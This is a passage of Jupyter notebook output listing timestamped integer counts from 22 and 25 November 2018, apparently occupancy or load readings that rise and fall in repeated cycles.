"['2018-11-22 09:39:28', '10']\n",
"['2018-11-22 09:40:01', '11']\n",
"['2018-11-22 09:41:04', '11']\n",
"['2018-11-22 09:41:44', '11']\n",
"['2018-11-22 09:42:07', '12']\n",
"['2018-11-22 09:42:54', '14']\n",
"['2018-11-22 09:43:51', '16']\n",
"['2018-11-22 09:45:14', '18']\n",
"['2018-11-22 09:46:42', '18']\n",
"['2018-11-22 09:47:12', '18']\n",
"['2018-11-22 09:47:26', '18']\n",
"['2018-11-22 09:48:56', '17']\n",
"['2018-11-22 09:49:46', '17']\n",
"['2018-11-22 09:56:55', '14']\n",
"['2018-11-22 09:59:23', '14']\n",
"['2018-11-22 10:01:45', '15']\n",
"['2018-11-22 10:03:25', '10']\n",
"['2018-11-22 10:05:09', '8']\n",
"['2018-11-22 10:09:04', '4']\n",
"['2018-11-22 10:10:40', '8']\n",
"['2018-11-22 10:13:21', '8']\n",
"['2018-11-22 10:14:07', '8']\n",
"['2018-11-22 10:14:15', '7']\n",
"['2018-11-22 10:15:45', '5']\n",
"['2018-11-22 10:17:27', '7']\n",
"['2018-11-22 10:18:48', '7']\n",
"['2018-11-22 10:19:24', '7']\n",
"['2018-11-22 10:19:40', '7']\n",
"['2018-11-22 10:20:01', '7']\n",
"['2018-11-22 10:20:30', '7']\n",
"['2018-11-22 10:21:05', '7']\n",
"['2018-11-22 10:21:31', '7']\n",
"['2018-11-22 10:21:48', '6']\n",
"['2018-11-22 10:24:28', '6']\n",
"['2018-11-22 10:26:46', '7']\n",
"['2018-11-22 10:27:34', '7']\n",
"['2018-11-22 10:29:20', '6']\n",
"['2018-11-22 10:31:06', '6']\n",
"['2018-11-22 10:32:53', '5']\n",
"['2018-11-22 10:34:39', '0']\n",
"['2018-11-22 10:36:26', '2']\n",
"['2018-11-22 10:37:18', '2']\n",
"['2018-11-22 10:39:21', '3']\n",
"['2018-11-22 10:43:16', '3']\n",
"['2018-11-22 10:44:19', '3']\n",
"['2018-11-22 10:44:45', '3']\n",
"['2018-11-22 10:45:31', '5']\n",
"['2018-11-22 10:46:20', '5']\n",
"['2018-11-22 10:46:36', '6']\n",
"['2018-11-22 10:47:30', '6']\n",
"['2018-11-22 10:47:40', '7']\n",
"['2018-11-22 10:49:50', '8']\n",
"['2018-11-22 10:50:57', '11']\n",
"['2018-11-22 10:52:10', '11']\n",
"['2018-11-22 10:53:19', '11']\n",
"['2018-11-22 10:53:26', '12']\n",
"['2018-11-22 10:56:52', '10']\n",
"['2018-11-22 10:58:17', '12']\n",
"['2018-11-22 11:01:22', '13']\n",
"['2018-11-22 11:03:02', '16']\n",
"['2018-11-22 11:05:27', '18']\n",
"['2018-11-22 11:06:15', '19']\n",
"['2018-11-22 11:11:04', '20']\n",
"['2018-11-22 11:13:54', '19']\n",
"['2018-11-22 11:14:38', '19']\n",
"['2018-11-22 11:14:52', '17']\n",
"['2018-11-22 11:17:10', '17']\n",
"['2018-11-22 11:17:26', '15']\n",
"['2018-11-22 11:18:26', '15']\n",
"['2018-11-22 11:19:23', '11']\n",
"['2018-11-22 11:20:34', '10']\n",
"['2018-11-22 11:21:32', '11']\n",
"['2018-11-22 11:22:22', '10']\n",
"['2018-11-22 11:23:54', '9']\n",
"['2018-11-22 11:25:04', '8']\n",
"['2018-11-22 11:26:00', '6']\n",
"['2018-11-22 11:27:33', '6']\n",
"['2018-11-22 11:28:03', '4']\n",
"['2018-11-22 11:28:53', '1']\n",
"['2018-11-22 11:30:46', '1']\n",
"['2018-11-22 11:31:27', '1']\n",
"['2018-11-22 11:32:08', '1']\n",
"['2018-11-22 11:32:34', '0']\n",
"['2018-11-22 11:36:20', '2']\n",
"['2018-11-22 11:36:59', '3']\n",
"['2018-11-22 11:37:54', '4']\n",
"['2018-11-22 11:39:04', '4']\n",
"['2018-11-22 11:41:23', '4']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 11:42:26', '4']\n",
"['2018-11-22 11:43:20', '4']\n",
"['2018-11-22 11:43:42', '7']\n",
"['2018-11-22 11:44:57', '7']\n",
"['2018-11-22 11:45:10', '9']\n",
"['2018-11-22 11:45:48', '9']\n",
"['2018-11-22 11:46:35', '9']\n",
"['2018-11-22 11:47:07', '9']\n",
"['2018-11-22 11:47:39', '9']\n",
"['2018-11-22 11:48:59', '11']\n",
"['2018-11-22 11:50:10', '11']\n",
"['2018-11-22 11:51:42', '11']\n",
"['2018-11-22 11:52:13', '12']\n",
"['2018-11-22 11:52:59', '13']\n",
"['2018-11-22 11:54:58', '13']\n",
"['2018-11-22 11:55:11', '12']\n",
"['2018-11-22 11:59:55', '13']\n",
"['2018-11-22 12:01:47', '17']\n",
"['2018-11-22 12:03:12', '16']\n",
"['2018-11-22 12:04:20', '8']\n",
"['2018-11-22 12:05:53', '10']\n",
"['2018-11-22 12:09:03', '19']\n",
"['2018-11-22 12:11:41', '26']\n",
"['2018-11-22 12:14:54', '28']\n",
"['2018-11-22 12:15:50', '29']\n",
"['2018-11-22 12:16:07', '26']\n",
"['2018-11-22 12:17:13', '22']\n",
"['2018-11-22 12:19:00', '22']\n",
"['2018-11-22 12:19:15', '21']\n",
"['2018-11-22 12:20:22', '17']\n",
"['2018-11-22 12:21:15', '14']\n",
"['2018-11-22 12:21:36', '14']\n",
"['2018-11-22 12:22:31', '13']\n",
"['2018-11-22 12:23:48', '11']\n",
"['2018-11-22 12:24:56', '11']\n",
"['2018-11-22 12:25:10', '11']\n",
"['2018-11-22 12:27:05', '8']\n",
"['2018-11-22 12:29:37', '6']\n",
"['2018-11-22 12:30:40', '6']\n",
"['2018-11-22 12:32:00', '4']\n",
"['2018-11-22 12:33:21', '2']\n",
"['2018-11-22 12:34:41', '2']\n",
"['2018-11-22 12:36:02', '0']\n",
"['2018-11-22 12:37:23', '6']\n",
"['2018-11-22 12:37:53', '9']\n",
"['2018-11-22 12:40:33', '9']\n",
"['2018-11-22 12:43:50', '9']\n",
"['2018-11-22 12:44:15', '9']\n",
"['2018-11-22 12:44:32', '10']\n",
"['2018-11-22 12:45:43', '10']\n",
"['2018-11-22 12:46:31', '10']\n",
"['2018-11-22 12:46:58', '10']\n",
"['2018-11-22 12:47:22', '12']\n",
"['2018-11-22 12:48:21', '12']\n",
"['2018-11-22 12:49:26', '16']\n",
"['2018-11-22 12:53:21', '17']\n",
"['2018-11-22 12:54:59', '19']\n",
"['2018-11-22 12:56:45', '19']\n",
"['2018-11-22 12:56:51', '20']\n",
"['2018-11-22 13:00:37', '24']\n",
"['2018-11-22 13:02:12', '30']\n",
"['2018-11-22 13:04:46', '33']\n",
"['2018-11-22 13:06:07', '36']\n",
"['2018-11-22 13:08:31', '32']\n",
"['2018-11-22 13:09:28', '34']\n",
"['2018-11-22 13:12:37', '24']\n",
"['2018-11-22 13:16:06', '25']\n",
"['2018-11-22 13:16:56', '26']\n",
"['2018-11-22 13:17:41', '27']\n",
"['2018-11-22 13:19:19', '25']\n",
"['2018-11-22 13:20:03', '23']\n",
"['2018-11-22 13:21:41', '23']\n",
"['2018-11-22 13:22:44', '17']\n",
"['2018-11-22 13:23:48', '14']\n",
"['2018-11-22 13:24:37', '11']\n",
"['2018-11-22 13:25:15', '10']\n",
"['2018-11-22 13:26:24', '8']\n",
"['2018-11-22 13:27:44', '5']\n",
"['2018-11-22 13:28:33', '3']\n",
"['2018-11-22 13:30:03', '3']\n",
"['2018-11-22 13:30:26', '3']\n",
"['2018-11-22 13:31:54', '3']\n",
"['2018-11-22 13:32:17', '4']\n",
"['2018-11-22 13:33:19', '4']\n",
"['2018-11-22 13:33:53', '4']\n",
"['2018-11-22 13:34:14', '0']\n",
"['2018-11-22 13:36:18', '0']\n",
"['2018-11-22 13:36:57', '0']\n",
"['2018-11-22 13:37:22', '0']\n",
"['2018-11-22 13:38:29', '0']\n",
"['2018-11-22 13:38:59', '0']\n",
"['2018-11-22 13:39:42', '0']\n",
"['2018-11-22 13:40:36', '0']\n",
"['2018-11-22 13:40:46', '1']\n",
"['2018-11-22 13:41:39', '1']\n",
"['2018-11-22 13:42:09', '1']\n",
"['2018-11-22 13:42:15', '3']\n",
"['2018-11-22 13:43:22', '4']\n",
"['2018-11-22 13:44:21', '4']\n",
"['2018-11-22 13:44:46', '4']\n",
"['2018-11-22 13:45:31', '4']\n",
"['2018-11-22 13:46:24', '5']\n",
"['2018-11-22 13:47:49', '5']\n",
"['2018-11-22 13:48:19', '5']\n",
"['2018-11-22 13:48:29', '5']\n",
"['2018-11-22 13:49:32', '6']\n",
"['2018-11-22 13:50:18', '9']\n",
"['2018-11-22 13:57:28', '11']\n",
"['2018-11-22 13:59:24', '11']\n",
"['2018-11-22 14:00:19', '12']\n",
"['2018-11-22 14:02:30', '12']\n",
"['2018-11-22 14:02:45', '11']\n",
"['2018-11-22 14:04:44', '13']\n",
"['2018-11-22 14:06:42', '13']\n",
"['2018-11-22 14:09:46', '10']\n",
"['2018-11-22 14:10:33', '9']\n",
"['2018-11-22 14:10:41', '10']\n",
"['2018-11-22 14:11:34', '9']\n",
"['2018-11-22 14:16:28', '9']\n",
"['2018-11-22 14:16:41', '9']\n",
"['2018-11-22 14:17:09', '10']\n",
"['2018-11-22 14:18:00', '10']\n",
"['2018-11-22 14:18:21', '7']\n",
"['2018-11-22 14:19:12', '5']\n",
"['2018-11-22 14:20:38', '5']\n",
"['2018-11-22 14:21:04', '5']\n",
"['2018-11-22 14:21:17', '5']\n",
"['2018-11-22 14:22:42', '4']\n",
"['2018-11-22 14:25:11', '2']\n",
"['2018-11-22 14:26:10', '2']\n",
"['2018-11-22 14:28:20', '2']\n",
"['2018-11-22 14:30:31', '2']\n",
"['2018-11-22 14:32:41', '1']\n",
"['2018-11-22 14:34:52', '0']\n",
"['2018-11-22 14:37:03', '1']\n",
"['2018-11-22 14:37:30', '7']\n",
"['2018-11-22 14:39:36', '8']\n",
"['2018-11-22 14:42:35', '13']\n",
"['2018-11-22 14:43:17', '17']\n",
"['2018-11-22 14:44:07', '16']\n",
"['2018-11-22 14:45:46', '16']\n",
"['2018-11-22 14:45:52', '17']\n",
"['2018-11-22 14:46:35', '18']\n",
"['2018-11-22 14:47:24', '20']\n",
"['2018-11-22 14:48:10', '20']\n",
"['2018-11-22 14:49:44', '20']\n",
"['2018-11-22 14:50:55', '20']\n",
"['2018-11-22 14:51:16', '21']\n",
"['2018-11-22 14:52:05', '19']\n",
"['2018-11-22 14:53:13', '21']\n",
"['2018-11-22 14:56:43', '24']\n",
"['2018-11-22 14:58:10', '29']\n",
"['2018-11-22 15:00:30', '26']\n",
"['2018-11-22 15:02:29', '26']\n",
"['2018-11-22 15:03:34', '24']\n",
"['2018-11-22 15:04:20', '26']\n",
"['2018-11-22 15:06:35', '18']\n",
"['2018-11-22 15:08:49', '18']\n",
"['2018-11-22 15:09:12', '19']\n",
"['2018-11-22 15:09:57', '21']\n",
"['2018-11-22 15:13:12', '21']\n",
"['2018-11-22 15:14:06', '36']\n",
"['2018-11-22 15:15:26', '36']\n",
"['2018-11-22 15:16:24', '30']\n",
"['2018-11-22 15:17:17', '31']\n",
"['2018-11-22 15:18:10', '23']\n",
"['2018-11-22 15:18:53', '21']\n",
"['2018-11-22 15:20:01', '20']\n",
"['2018-11-22 15:21:40', '20']\n",
"['2018-11-22 15:22:06', '13']\n",
"['2018-11-22 15:23:14', '6']\n",
"['2018-11-22 15:24:23', '6']\n",
"['2018-11-22 15:24:51', '6']\n",
"['2018-11-22 15:26:46', '6']\n",
"['2018-11-22 15:27:15', '4']\n",
"['2018-11-22 15:28:10', '3']\n",
"['2018-11-22 15:28:53', '0']\n",
"['2018-11-22 15:38:17', '2']\n",
"['2018-11-22 15:38:49', '3']\n",
"['2018-11-22 15:39:39', '5']\n",
"['2018-11-22 15:40:38', '5']\n",
"['2018-11-22 15:41:05', '5']\n",
"['2018-11-22 15:41:43', '7']\n",
"['2018-11-22 15:42:32', '10']\n",
"['2018-11-22 15:42:43', '11']\n",
"['2018-11-22 15:43:27', '11']\n",
"['2018-11-22 15:44:11', '11']\n",
"['2018-11-22 15:44:16', '11']\n",
"['2018-11-22 15:45:21', '11']\n",
"['2018-11-22 15:45:39', '11']\n",
"['2018-11-22 15:46:25', '12']\n",
"['2018-11-22 15:47:17', '16']\n",
"['2018-11-22 15:48:03', '17']\n",
"['2018-11-22 15:49:24', '17']\n",
"['2018-11-22 15:49:50', '17']\n",
"['2018-11-22 15:49:55', '19']\n",
"['2018-11-22 15:51:20', '19']\n",
"['2018-11-22 15:52:02', '19']\n",
"['2018-11-22 15:55:17', '21']\n",
"['2018-11-22 15:58:08', '21']\n",
"['2018-11-22 15:59:04', '26']\n",
"['2018-11-22 16:01:02', '22']\n",
"['2018-11-22 16:01:52', '25']\n",
"['2018-11-22 16:04:17', '25']\n",
"['2018-11-22 16:05:52', '24']\n",
"['2018-11-22 16:08:25', '24']\n",
"['2018-11-22 16:08:57', '24']\n",
"['2018-11-22 16:09:10', '22']\n",
"['2018-11-22 16:10:26', '21']\n",
"['2018-11-22 16:11:23', '20']\n",
"['2018-11-22 16:12:26', '19']\n",
"['2018-11-22 16:13:15', '17']\n",
"['2018-11-22 16:14:01', '17']\n",
"['2018-11-22 16:14:25', '17']\n",
"['2018-11-22 16:14:49', '16']\n",
"['2018-11-22 16:15:54', '14']\n",
"['2018-11-22 16:16:44', '12']\n",
"['2018-11-22 16:17:25', '12']\n",
"['2018-11-22 16:18:46', '11']\n",
"['2018-11-22 16:21:37', '3']\n",
"['2018-11-22 16:22:34', '0']\n",
"['2018-11-22 16:25:16', '0']\n",
"['2018-11-22 16:27:58', '0']\n",
"['2018-11-22 16:30:41', '0']\n",
"['2018-11-22 16:33:23', '0']\n",
"['2018-11-22 16:36:06', '2']\n",
"['2018-11-22 16:36:44', '13']\n",
"['2018-11-22 16:40:10', '13']\n",
"['2018-11-22 16:42:46', '15']\n",
"['2018-11-22 16:43:38', '14']\n",
"['2018-11-22 16:44:01', '14']\n",
"['2018-11-22 16:44:41', '14']\n",
"['2018-11-22 16:44:55', '14']\n",
"['2018-11-22 16:45:17', '14']\n",
"['2018-11-22 16:45:41', '14']\n",
"['2018-11-22 16:45:53', '14']\n",
"['2018-11-22 16:47:31', '14']\n",
"['2018-11-22 16:48:24', '18']\n",
"['2018-11-22 16:49:17', '22']\n",
"['2018-11-22 16:50:03', '21']\n",
"['2018-11-22 16:51:26', '23']\n",
"['2018-11-22 16:53:54', '20']\n",
"['2018-11-22 16:55:16', '22']\n",
"['2018-11-22 16:58:06', '21']\n",
"['2018-11-22 16:59:19', '19']\n",
"['2018-11-22 17:00:21', '19']\n",
"['2018-11-22 17:02:15', '19']\n",
"['2018-11-22 17:03:38', '16']\n",
"['2018-11-22 17:06:24', '20']\n",
"['2018-11-22 17:07:13', '17']\n",
"['2018-11-22 17:08:02', '18']\n",
"['2018-11-22 17:10:15', '19']\n",
"['2018-11-22 17:10:57', '19']\n",
"['2018-11-22 17:11:30', '19']\n",
"['2018-11-22 17:12:26', '14']\n",
"['2018-11-22 17:13:25', '12']\n",
"['2018-11-22 17:14:12', '10']\n",
"['2018-11-22 17:14:56', '10']\n",
"['2018-11-22 17:15:46', '10']\n",
"['2018-11-22 17:16:19', '9']\n",
"['2018-11-22 17:17:09', '7']\n",
"['2018-11-22 17:18:13', '7']\n",
"['2018-11-22 17:19:17', '6']\n",
"['2018-11-22 17:20:27', '8']\n",
"['2018-11-22 17:22:30', '8']\n",
"['2018-11-22 17:23:01', '8']\n",
"['2018-11-22 17:23:27', '5']\n",
"['2018-11-22 17:24:13', '0']\n",
"['2018-11-22 17:37:34', '0']\n",
"['2018-11-22 17:38:11', '0']\n",
"['2018-11-22 17:38:50', '0']\n",
"['2018-11-22 17:39:26', '0']\n",
"['2018-11-22 17:40:05', '0']\n",
"['2018-11-22 17:40:36', '2']\n",
"['2018-11-22 17:41:33', '3']\n",
"['2018-11-22 17:42:37', '3']\n",
"['2018-11-22 17:42:57', '4']\n",
"['2018-11-22 17:43:38', '5']\n",
"['2018-11-22 17:44:28', '5']\n",
"['2018-11-22 17:45:05', '6']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 17:45:53', '8']\n",
"['2018-11-22 17:46:41', '11']\n",
"['2018-11-22 17:47:42', '13']\n",
"['2018-11-22 17:48:34', '14']\n",
"['2018-11-22 17:50:02', '14']\n",
"['2018-11-22 17:50:27', '16']\n",
"['2018-11-22 17:51:28', '16']\n",
"['2018-11-22 17:52:58', '17']\n",
"['2018-11-22 17:53:50', '18']\n",
"['2018-11-22 17:59:53', '20']\n",
"['2018-11-22 18:02:19', '20']\n",
"['2018-11-22 18:03:51', '24']\n",
"['2018-11-22 18:05:30', '20']\n",
"['2018-11-22 18:06:24', '17']\n",
"['2018-11-22 18:08:15', '15']\n",
"['2018-11-22 18:09:27', '16']\n",
"['2018-11-22 18:12:03', '17']\n",
"['2018-11-22 18:12:37', '16']\n",
"['2018-11-22 18:12:46', '16']\n",
"['2018-11-22 18:17:36', '16']\n",
"['2018-11-22 18:18:04', '12']\n",
"['2018-11-22 18:19:21', '9']\n",
"['2018-11-22 18:20:18', '9']\n",
"['2018-11-22 18:20:36', '9']\n",
"['2018-11-22 18:20:51', '8']\n",
"['2018-11-22 18:21:42', '7']\n",
"['2018-11-22 18:22:43', '6']\n",
"['2018-11-22 18:23:26', '5']\n",
"['2018-11-22 18:24:05', '4']\n",
"['2018-11-22 18:25:38', '4']\n",
"['2018-11-22 18:27:36', '4']\n",
"['2018-11-22 18:28:21', '2']\n",
"['2018-11-22 18:30:23', '2']\n",
"['2018-11-22 18:32:26', '2']\n",
"['2018-11-22 18:34:28', '2']\n",
"['2018-11-22 18:36:31', '0']\n",
"['2018-11-22 18:38:34', '2']\n",
"['2018-11-22 18:39:20', '7']\n",
"['2018-11-22 18:43:48', '30']\n",
"['2018-11-22 18:46:50', '30']\n",
"['2018-11-22 18:47:28', '31']\n",
"['2018-11-22 18:48:09', '33']\n",
"['2018-11-22 18:49:19', '33']\n",
"['2018-11-22 18:49:32', '33']\n",
"['2018-11-22 18:49:52', '33']\n",
"['2018-11-22 18:50:08', '34']\n",
"['2018-11-22 18:50:50', '34']\n",
"['2018-11-22 18:52:44', '35']\n",
"['2018-11-22 18:53:41', '38']\n",
"['2018-11-22 18:54:34', '36']\n",
"['2018-11-22 18:56:22', '36']\n",
"['2018-11-22 18:56:34', '34']\n",
"['2018-11-22 18:58:31', '33']\n",
"['2018-11-22 18:59:38', '38']\n",
"['2018-11-22 19:02:47', '45']\n",
"['2018-11-22 19:03:31', '41']\n",
"['2018-11-22 19:05:18', '39']\n",
"['2018-11-22 19:06:10', '31']\n",
"['2018-11-22 19:09:02', '25']\n",
"['2018-11-22 19:11:59', '25']\n",
"['2018-11-22 19:12:10', '22']\n",
"['2018-11-22 19:12:49', '21']\n",
"['2018-11-22 19:16:39', '16']\n",
"['2018-11-22 19:17:21', '16']\n",
"['2018-11-22 19:17:46', '16']\n",
"['2018-11-22 19:18:36', '13']\n",
"['2018-11-22 19:19:30', '13']\n",
"['2018-11-22 19:19:48', '16']\n",
"['2018-11-22 19:20:37', '15']\n",
"['2018-11-22 19:21:43', '14']\n",
"['2018-11-22 19:22:26', '13']\n",
"['2018-11-22 19:23:13', '11']\n",
"['2018-11-22 19:24:18', '5']\n",
"['2018-11-22 19:25:37', '4']\n",
"['2018-11-22 19:26:26', '4']\n",
"['2018-11-22 19:26:50', '2']\n",
"['2018-11-22 19:27:35', '1']\n",
"['2018-11-22 19:28:22', '1']\n",
"['2018-11-22 19:28:35', '0']\n",
"['2018-11-22 19:39:34', '0']\n",
"['2018-11-22 19:40:25', '2']\n",
"['2018-11-22 19:41:50', '2']\n",
"['2018-11-22 19:42:34', '2']\n",
"['2018-11-22 19:43:54', '2']\n",
"['2018-11-22 19:44:28', '2']\n",
"['2018-11-22 19:45:47', '2']\n",
"['2018-11-22 19:46:47', '3']\n",
"['2018-11-22 19:47:52', '7']\n",
"['2018-11-22 19:48:53', '8']\n",
"['2018-11-22 19:49:01', '9']\n",
"['2018-11-22 19:50:12', '10']\n",
"['2018-11-22 19:51:08', '11']\n",
"['2018-11-22 19:52:11', '13']\n",
"['2018-11-22 19:53:28', '11']\n",
"['2018-11-22 19:54:43', '12']\n",
"['2018-11-22 19:56:30', '12']\n",
"['2018-11-22 19:57:04', '12']\n",
"['2018-11-22 19:57:15', '11']\n",
"['2018-11-22 19:59:26', '11']\n",
"['2018-11-22 20:00:13', '12']\n",
"['2018-11-22 20:04:48', '15']\n",
"['2018-11-22 20:07:22', '15']\n",
"['2018-11-22 20:08:48', '17']\n",
"['2018-11-22 20:09:49', '15']\n",
"['2018-11-22 20:11:48', '21']\n",
"['2018-11-22 20:14:32', '21']\n",
"['2018-11-22 20:16:21', '24']\n",
"['2018-11-22 20:19:53', '23']\n",
"['2018-11-22 20:20:49', '24']\n",
"['2018-11-22 20:20:57', '21']\n",
"['2018-11-22 20:21:54', '17']\n",
"['2018-11-22 20:23:09', '17']\n",
"['2018-11-22 20:23:19', '14']\n",
"['2018-11-22 20:24:31', '14']\n",
"['2018-11-22 20:24:57', '13']\n",
"['2018-11-22 20:25:19', '13']\n",
"['2018-11-22 20:26:24', '14']\n",
"['2018-11-22 20:27:36', '12']\n",
"['2018-11-22 20:28:44', '12']\n",
"['2018-11-22 20:29:05', '12']\n",
"['2018-11-22 20:30:31', '11']\n",
"['2018-11-22 20:32:59', '5']\n",
"['2018-11-22 20:33:47', '2']\n",
"['2018-11-22 20:34:34', '2']\n",
"['2018-11-22 20:35:21', '2']\n",
"['2018-11-22 20:36:09', '2']\n",
"['2018-11-22 20:36:56', '0']\n",
"['2018-11-22 20:37:44', '1']\n",
"['2018-11-22 20:38:04', '4']\n",
"['2018-11-22 20:40:40', '4']\n",
"['2018-11-22 20:43:23', '4']\n",
"['2018-11-22 20:43:40', '2']\n",
"['2018-11-22 20:44:36', '2']\n",
"['2018-11-22 20:45:20', '2']\n",
"['2018-11-22 20:45:36', '2']\n",
"['2018-11-22 20:46:01', '2']\n",
"['2018-11-22 20:46:28', '2']\n",
"['2018-11-22 20:46:50', '2']\n",
"['2018-11-22 20:49:53', '2']\n",
"['2018-11-22 20:55:44', '4']\n",
"['2018-11-22 20:56:36', '5']\n",
"['2018-11-22 20:57:26', '6']\n",
"['2018-11-22 20:58:14', '7']\n",
"['2018-11-22 21:01:06', '7']\n",
"['2018-11-22 21:02:18', '12']\n",
"['2018-11-22 21:04:41', '11']\n",
"['2018-11-22 21:06:09', '11']\n",
"['2018-11-22 21:06:39', '14']\n",
"['2018-11-22 21:07:26', '11']\n",
"['2018-11-22 21:09:51', '12']\n",
"['2018-11-22 21:12:21', '11']\n",
"['2018-11-22 21:13:03', '9']\n",
"['2018-11-22 21:14:03', '9']\n",
"['2018-11-22 21:16:20', '9']\n",
"['2018-11-22 21:17:11', '9']\n",
"['2018-11-22 21:17:40', '9']\n",
"['2018-11-22 21:18:40', '5']\n",
"['2018-11-22 21:20:01', '1']\n",
"['2018-11-22 21:20:57', '2']\n",
"['2018-11-22 21:21:53', '3']\n",
"['2018-11-22 21:22:42', '4']\n",
"['2018-11-22 21:23:39', '8']\n",
"['2018-11-22 21:24:30', '8']\n",
"['2018-11-22 21:25:37', '7']\n",
"['2018-11-22 21:26:46', '7']\n",
"['2018-11-22 21:27:07', '10']\n",
"['2018-11-22 21:31:12', '9']\n",
"['2018-11-22 21:32:05', '0']\n",
"['2018-11-22 21:33:58', '1']\n",
"['2018-11-22 21:35:43', '1']\n",
"['2018-11-22 21:39:40', '1']\n",
"['2018-11-22 21:39:53', '1']\n",
"['2018-11-22 21:40:26', '0']\n",
"['2018-11-22 21:41:24', '1']\n",
"['2018-11-22 21:42:27', '3']\n",
"['2018-11-22 21:42:36', '3']\n",
"['2018-11-22 21:43:23', '3']\n",
"['2018-11-22 21:44:13', '3']\n",
"['2018-11-22 21:44:53', '3']\n",
"['2018-11-22 21:45:16', '3']\n",
"['2018-11-22 21:46:10', '3']\n",
"['2018-11-22 21:46:42', '3']\n",
"['2018-11-22 21:47:42', '3']\n",
"['2018-11-22 21:48:11', '3']\n",
"['2018-11-22 21:48:20', '3']\n",
"['2018-11-22 21:49:36', '3']\n",
"['2018-11-22 21:49:52', '3']\n",
"['2018-11-22 21:54:15', '3']\n",
"['2018-11-22 21:55:43', '3']\n",
"['2018-11-22 21:56:12', '3']\n",
"['2018-11-22 21:57:43', '3']\n",
"['2018-11-22 21:58:52', '3']\n",
"['2018-11-22 22:00:13', '2']\n",
"['2018-11-22 22:01:18', '0']\n",
"['2018-11-25 06:13:00', '1']\n",
"['2018-11-25 06:13:41', '2']\n",
"['2018-11-25 06:16:00', '2']\n",
"['2018-11-25 06:16:28', '2']\n",
"['2018-11-25 06:17:29', '2']\n",
"['2018-11-25 06:18:00', '2']\n",
"['2018-11-25 06:18:36', '2']\n",
"['2018-11-25 06:19:01', '2']\n",
"['2018-11-25 06:19:19', '2']\n",
"['2018-11-25 06:20:37', '2']\n",
"['2018-11-25 06:21:19', '2']\n",
"['2018-11-25 06:21:41', '2']\n",
"['2018-11-25 06:22:32', '4']\n",
"['2018-11-25 06:23:00', '4']\n",
"['2018-11-25 06:23:39', '4']\n",
"['2018-11-25 06:24:00', '4']\n",
"['2018-11-25 06:24:19', '4']\n",
"['2018-11-25 06:26:00', '3']\n",
"['2018-11-25 06:26:43', '3']\n",
"['2018-11-25 06:30:00', '0']\n",
"['2018-11-25 07:19:00', '3']\n",
"['2018-11-25 07:20:55', '3']\n",
"['2018-11-25 07:21:26', '3']\n",
"['2018-11-25 07:22:00', '3']\n",
"['2018-11-25 07:23:30', '3']\n",
"['2018-11-25 07:24:00', '3']\n",
"['2018-11-25 07:24:46', '3']\n",
"['2018-11-25 07:26:00', '2']\n",
"['2018-11-25 07:26:33', '2']\n",
"['2018-11-25 07:27:08', '2']\n",
"['2018-11-25 07:27:32', '2']\n",
"['2018-11-25 07:28:46', '2']\n",
"['2018-11-25 07:29:23', '2']\n",
"['2018-11-25 07:30:00', '2']\n",
"['2018-11-25 07:30:49', '1']\n",
"['2018-11-25 07:31:41', '0']\n",
"['2018-11-25 07:32:00', '0']\n",
"['2018-11-25 07:34:36', '0']\n",
"['2018-11-25 07:35:00', '0']\n",
"['2018-11-25 07:40:00', '0']\n",
"['2018-11-25 07:40:41', '2']\n",
"['2018-11-25 07:43:00', '3']\n",
"['2018-11-25 07:43:28', '3']\n",
"['2018-11-25 07:44:29', '3']\n",
"['2018-11-25 07:45:00', '3']\n",
"['2018-11-25 07:45:36', '3']\n",
"['2018-11-25 07:46:01', '3']\n",
"['2018-11-25 07:46:19', '3']\n",
"['2018-11-25 07:47:37', '3']\n",
"['2018-11-25 07:48:19', '3']\n",
"['2018-11-25 07:48:41', '3']\n",
"['2018-11-25 07:49:32', '4']\n",
"['2018-11-25 07:50:00', '4']\n",
"['2018-11-25 07:50:39', '4']\n",
"['2018-11-25 07:51:00', '4']\n",
"['2018-11-25 07:51:19', '4']\n",
"['2018-11-25 07:53:00', '5']\n",
"['2018-11-25 07:53:47', '5']\n",
"['2018-11-25 07:58:00', '5']\n",
"['2018-11-25 07:59:00', '5']\n",
"['2018-11-25 08:00:26', '5']\n",
"['2018-11-25 08:02:00', '5']\n",
"['2018-11-25 08:03:00', '5']\n",
"['2018-11-25 08:05:00', '4']\n",
"['2018-11-25 08:06:00', '5']\n",
"['2018-11-25 08:07:01', '5']\n",
"['2018-11-25 08:07:43', '3']\n",
"['2018-11-25 08:08:07', '2']\n",
"['2018-11-25 08:08:51', '2']\n",
"['2018-11-25 08:09:38', '2']\n",
"['2018-11-25 08:10:00', '2']\n",
"['2018-11-25 08:10:43', '2']\n",
"['2018-11-25 08:11:19', '2']\n",
"['2018-11-25 08:12:00', '2']\n",
"['2018-11-25 08:12:53', '2']\n",
"['2018-11-25 08:13:45', '2']\n",
"['2018-11-25 08:14:30', '2']\n",
"['2018-11-25 08:14:55', '2']\n",
"['2018-11-25 08:16:20', '2']\n",
"['2018-11-25 08:17:16', '1']\n",
"['2018-11-25 08:18:00', '1']\n",
"['2018-11-25 08:19:00', '1']\n",
"['2018-11-25 08:19:10', '1']\n",
"['2018-11-25 08:19:32', '1']\n",
"['2018-11-25 08:19:47', '1']\n",
"['2018-11-25 08:20:11', '0']\n",
"['2018-11-25 08:20:33', '0']\n",
"['2018-11-25 08:21:00', '0']\n",
"['2018-11-25 08:25:00', '0']\n",
"['2018-11-25 08:25:40', '0']\n",
"['2018-11-25 08:26:09', '0']\n",
"['2018-11-25 08:26:44', '0']\n",
"['2018-11-25 08:27:12', '0']\n",
"['2018-11-25 08:27:32', '0']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 08:28:00', '0']\n",
"['2018-11-25 08:28:44', '2']\n",
"['2018-11-25 08:31:22', '7']\n",
"['2018-11-25 08:32:00', '7']\n",
"['2018-11-25 08:32:39', '7']\n",
"['2018-11-25 08:33:36', '7']\n",
"['2018-11-25 08:34:00', '7']\n",
"['2018-11-25 08:34:39', '9']\n",
"['2018-11-25 08:35:22', '10']\n",
"['2018-11-25 08:35:55', '10']\n",
"['2018-11-25 08:37:00', '10']\n",
"['2018-11-25 08:38:00', '13']\n",
"['2018-11-25 08:38:49', '13']\n",
"['2018-11-25 08:39:33', '13']\n",
"['2018-11-25 08:40:05', '13']\n",
"['2018-11-25 08:42:00', '13']\n",
"['2018-11-25 08:43:00', '13']\n",
"['2018-11-25 08:45:00', '15']\n",
"['2018-11-25 08:46:00', '15']\n",
"['2018-11-25 08:48:04', '14']\n",
"['2018-11-25 08:49:00', '14']\n",
